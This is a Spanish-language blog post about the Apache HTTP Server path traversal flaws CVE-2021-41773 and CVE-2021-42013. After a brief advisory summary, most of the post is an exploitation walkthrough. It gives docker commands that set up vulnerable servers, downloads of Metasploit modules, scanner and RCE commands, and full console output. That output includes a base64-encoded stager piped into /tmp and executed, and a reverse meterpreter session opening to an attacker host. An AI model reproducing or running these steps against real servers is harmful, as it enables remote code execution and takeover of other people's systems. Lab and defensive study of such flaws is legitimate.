El 5 de octubre, el Proyecto del servidor HTTP Apache parcheó CVE-2021-41773, una vulnerabilidad de divulgación de archivos y cruce de ruta en el servidor HTTP Apache, un servidor web de código abierto para Unix y Windows que se encuentra entre los servidores web más utilizados.
Según el aviso de seguridad, CVE-2021-41773 se ha explotado en la naturaleza como un zero day. La vulnerabilidad fue revelada al Proyecto del servidor HTTP Apache el 29 de septiembre por Ash Daulton y el equipo de seguridad de cPanel. Sin embargo, el aviso no indica cuándo se detectó la explotación de CVE-2021-41773, pero es lógico que la explotación impulsó el lanzamiento acelerado de un parche.
Según una búsqueda de Shodan, poco menos de 112.000 servidores HTTP Apache ejecutan la versión vulnerable. Sin embargo, es posible que otros servidores web vulnerables estén configurados para no mostrar información de versión.
Esta vulnerabilidad se ha reintroducido en la corrección de Apache 2.4.50 (CVE-2021-42013).
Se encontró que la corrección para CVE-2021-41773 en Apache HTTP Server 2.4.50 era insuficiente. Un atacante podría usar un ataque de recorrido de ruta para asignar URL a archivos fuera de los directorios configurados por directivas similares a Alias. Si los archivos fuera de estos directorios no están protegidos por la configuración predeterminada habitual "requieren todos denegados", estas solicitudes pueden tener éxito. Si los scripts CGI también están habilitados para estos parches con alias, esto podría permitir la ejecución remota de código. Este problema solo afecta a Apache 2.4.49 y Apache 2.4.50 y no a versiones anteriores.
Instalación de tu laboratorio:
docker run -dit --name CVE-2021-41773 -p 8080:80 -v /opt/apache2.4.49:/usr/local/apache2/htdocs httpd:2.4.49
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/denied/granted/" conf/httpd.conf
docker stop CVE-2021-41773
docker start CVE-2021-41773Para la versión 2.4.50
docker run -dit --name CVE-2021-42013 -p 8080:80 -v /opt/apache2.4.50:/usr/local/apache2/htdocs httpd:2.4.50
docker exec -it CVE-2021-42013 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it CVE-2021-42013 sed -i "0,/denied/s/denied/granted/" conf/httpd.conf
docker stop CVE-2021-42013
docker start CVE-2021-42013Instalación de laboratorio para Remote Code Execution:
docker run -dit --name CVE-2021-41773 -p 8080:80 -v /opt/apache2.4.49:/usr/local/apache2/htdocs httpd:2.4.49
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/denied/granted/" conf/httpd.conf
docker exec -it CVE-2021-41773 sed -i -E "s|all denied|all granted|g; s|#(.* cgid_.*)|\1|g" conf/httpd.conf
docker stop CVE-2021-41773
docker start CVE-2021-41773Para la versión 2.4.50 Remote Code Execution:
docker run -dit --name CVE-2021-42013 -p 8080:80 -v /opt/apache2.4.50:/usr/local/apache2/htdocs httpd:2.4.50
docker exec -it CVE-2021-42013 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it CVE-2021-42013 sed -i "0,/denied/s/denied/granted/" conf/httpd.conf
docker exec -it CVE-2021-42013 sed -i -E "s|all denied|all granted|g; s|#(.* cgid_.*)|\1|g" conf/httpd.conf
docker stop CVE-2021-42013
docker start CVE-2021-42013Verificación: Enumere los pasos necesarios para asegurarse de que esto funcione con metasploit.
/usr/share/metasploit-framework/modules/auxiliary
wget https://raw.githubusercontent.com/Zeop-CyberSec/apache_normalize_path/master/apache_normalize_path.rb
wget https://raw.githubusercontent.com/Zeop-CyberSec/apache_normalize_path/master/apache_normalize_path_rce.rbComando para Metasploit:
use auxiliary/scanner/http/apache_normalize_path
set RHOSTS [IP]
set RPORT 8080
set SSL false
runComando para metasploit para un RCE:
use exploit/multi/http/apache_normalize_path_rce
set RHOSTS [IP]
set RPORT 8080
set SSL false
set LHOST [IP]
set VERBOSE true
runPATH RESULTADO:
msf6 exploit(multi/http/apache_normalize_path_rce) > use exploit/multi/http/apache_normalize_path_rce [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/http/apache_normalize_path_rce) > set target 1 target => 1 msf6 exploit(multi/http/apache_normalize_path_rce) > setg rhosts 172.20.4.11 rhosts => 172.20.4.11 msf6 exploit(multi/http/apache_normalize_path_rce) > setg rport 8080 rport => 8080 msf6 exploit(multi/http/apache_normalize_path_rce) > setg ssl false ssl => false msf6 exploit(multi/http/apache_normalize_path_rce) > setg verbose true verbose => true msf6 exploit(multi/http/apache_normalize_path_rce) > set cmd uname -a cmd => uname -a msf6 exploit(multi/http/apache_normalize_path_rce) > run [+] uname -a [*] Using auxiliary/scanner/http/apache_normalize_path as check [+] http://172.20.4.11:8080 - The target is vulnerable to CVE-2021-42013 (mod_cgi enabled). [*] Scanned 1 of 1 hosts (100% complete) [*] http://172.20.4.11:8080 - Attempt to exploit for CVE-2021-42013 [*] http://172.20.4.11:8080 - Generated payload: uname -a [!] http://172.20.4.11:8080 - Dumping command output in response Linux 184ef33f9859 5.14.0-1-amd64 #1 SMP Debian 5.14.6-3 (2021-09-28) x86_64 GNU/Linux msf6 exploit(multi/http/apache_normalize_path_rce) >Resultado RCE:
msf6 exploit(multi/http/apache_normalize_path_rce) > use exploit/multi/http/apache_normalize_path_rce [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/http/apache_normalize_path_rce) > setg RHOSTS 172.20.4.11 RHOSTS => 172.20.4.11 msf6 exploit(multi/http/apache_normalize_path_rce) > setg rport 8080 rport => 8080 msf6 exploit(multi/http/apache_normalize_path_rce) > setg ssl false ssl => false msf6 exploit(multi/http/apache_normalize_path_rce) > setg verbose true verbose => true msf6 exploit(multi/http/apache_normalize_path_rce) > set lhost 172.20.7.36 lhost => 172.20.7.36 msf6 exploit(multi/http/apache_normalize_path_rce) > run [*] Started reverse TCP handler on 172.20.7.36:4444 [*] Using auxiliary/scanner/http/apache_normalize_path as check [+] http://172.20.4.11:8080 - The target is vulnerable to CVE-2021-42013 (mod_cgi enabled). [*] Scanned 1 of 1 hosts (100% complete) [*] http://172.20.4.11:8080 - Attempt to exploit for CVE-2021-42013 [*] http://172.20.4.11:8080 - Sending linux/x64/meterpreter/reverse_tcp command payload [*] http://172.20.4.11:8080 - Generated command payload: echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwUByRRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g== | base64 -d > /tmp/PJaT; chmod +x /tmp/PJaT; /tmp/PJaT; rm -f /tmp/PJaT [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3012548 bytes) to 172.20.4.11 [*] Meterpreter session 1 opened (172.20.7.36:4444 -> 172.20.4.11:48540) at 2021-10-08 13:58:13 +0400 [!] This exploit may require manual cleanup of '/tmp/PJaT' on the target meterpreter >
Tambien podes realizar con NMAP:
git clone https://github.com/creadpag/CVE-2021-41773-POC.git
mv cve-2021-41773.nse /usr/share/nmap/scripts/
sudo nmap -Pn --script=cve-2021-41773.nse X.X.X.X -p XMuchas gracias por leer este post y no olvides en compartirlo, seguire actualizando este post por algun cambio de riesgo sobre esta vulnerabilidad.
0 Comentarios